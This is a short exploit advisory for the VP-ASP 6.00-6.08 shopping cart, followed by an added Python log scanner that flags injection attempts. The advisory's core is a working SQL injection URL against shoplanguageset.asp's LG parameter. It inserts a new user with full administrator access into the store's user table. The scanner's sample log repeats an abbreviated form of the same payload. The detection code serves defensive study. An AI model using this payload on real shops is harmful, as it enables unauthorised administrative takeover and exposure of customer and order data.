VP-ASP 6.00-6.08 SQL Injection / Exploit Advisory by tracewa
`VP-ASP 6.00-6.08? SQL Injection / Exploit by tracewar([email protected])
I'm not responsible for any illegal actions
taken by people using the information in this document, if you don't agree please stop reading
and close this text document asap.
* this information is for educational purposes only!
* I didn't check this against the new 6.08 patch, but it's probably vulnerable too.
OK for the guys at vp-asp,
you should choose a different coding language for your shopping cart :(
I'm tired of writing vp-asp advisories 24/7 until you guys release version 7.00
and take the security issue seriously, I'm not going to audit your code anymore.
----- THE BUG:
the bug exists in the shoplanguageset.asp file, in the "LG" query-string parameter:
I didn't have a normal vp-asp shopping cart for testing but this hack should work:
add user a/a just like the old one:
/shoplanguageset.asp?LG=English';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--
-tracewar`
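
A log check for the issue described above, added here as an example and not part of the original advisory: it scans web server logs for requests to shoplanguageset.asp whose LG value is anything other than a plain language name. Assumptions: IIS W3C extended logs with a #Fields header, a letters-only allowlist for LG, and the names TARGET, SAFE_LG, lg_values and suspicious_requests, which are made up for this example.

```python
import re
from urllib.parse import unquote_plus

TARGET = "/shoplanguageset.asp"
# Assumption: a legitimate language name is letters only ("English" is the
# only value the advisory shows).
SAFE_LG = re.compile(r"[A-Za-z]{1,32}")

# Constructed sample log (IIS W3C extended format); addresses are from
# documentation ranges and the third request is abbreviated.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-01-01 10:00:01 192.0.2.10 GET /shoplanguageset.asp LG=English 200
2005-01-01 10:00:05 192.0.2.10 GET /shopdisplayproducts.asp id=3 200
2005-01-01 10:02:17 198.51.100.7 GET /shoplanguageset.asp LG=English'%3Binsert+into+tbluser+(...)-- 200
2005-01-01 10:03:40 198.51.100.7 GET /ShopLanguageSet.asp lg=French%27-- 500
"""

def lg_values(query):
    """Yield every decoded LG value in a raw query string (name is case-insensitive)."""
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name).lower() == "lg":
            yield unquote_plus(value)

def suspicious_requests(log_text):
    """Return (date, time, client_ip, lg_value) for requests to TARGET whose LG is off the allowlist."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        if row.get("cs-uri-stem", "").lower() != TARGET:
            continue
        for value in lg_values(row.get("cs-uri-query", "")):
            if not SAFE_LG.fullmatch(value):
                hits.append((row.get("date"), row.get("time"), row.get("c-ip"), value))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(*hit, sep="  ")
```

The same letters-only allowlist, applied to LG inside the application before the value reaches any SQL statement, rejects the request shown in the advisory.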